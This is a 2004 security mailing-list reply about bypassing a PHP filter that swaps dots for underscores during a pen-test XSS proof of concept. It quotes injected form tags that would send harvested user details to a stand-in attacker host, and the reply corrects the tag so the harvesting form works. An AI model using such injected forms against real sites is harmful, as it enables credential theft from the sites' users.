WebApp Sec mailing list archives
Re: Fullstop Substitution in XSS
From: Liam Quinn <liam () htmlhelp com>
Date: Mon, 31 May 2004 22:04:34 -0400 (EDT)
On Sat, 29 May 2004, Calum Power wrote:
As a part of a recent Pen-Test, I came across an XSS vulnerabiity. The PHP script that has this vuln is filtering fullstops (.) and replacing them with underscores (_). Now, I'm trying trying to write a Proof-of-Concept, in which a (convincing) form would be outputted that could 'harvest' user details and send them to an attacker's webserver. My problem lies in the output of the form tags. Any: <form target="http://attacker.com/path/to/script"> is of course being filtered into: <form target="http://attacker_com/path/to/script">
<form action="http://attacker.com/path/to/script"> -- Liam Quinn
Current thread:
- Fullstop Substitution in XSS Calum Power (May 31)
- RE: Fullstop Substitution in XSS V. Poddubniy (Jun 01)
- RE: Fullstop Substitution in XSS Harry Metcalfe (Jun 01)
- RE: Fullstop Substitution in XSS Pete Foster (Jun 01)
- Re: Fullstop Substitution in XSS windo (Jun 01)
- Re: Fullstop Substitution in XSS Jonathan Stade (Jun 01)
- Re: Fullstop Substitution in XSS Liam Quinn (Jun 01)
- Re: Fullstop Substitution in XSS Joseph Birr-Pixton (Jun 01)
- <Possible follow-ups>
- RE: Fullstop Substitution in XSS Michael Silk (Jun 01)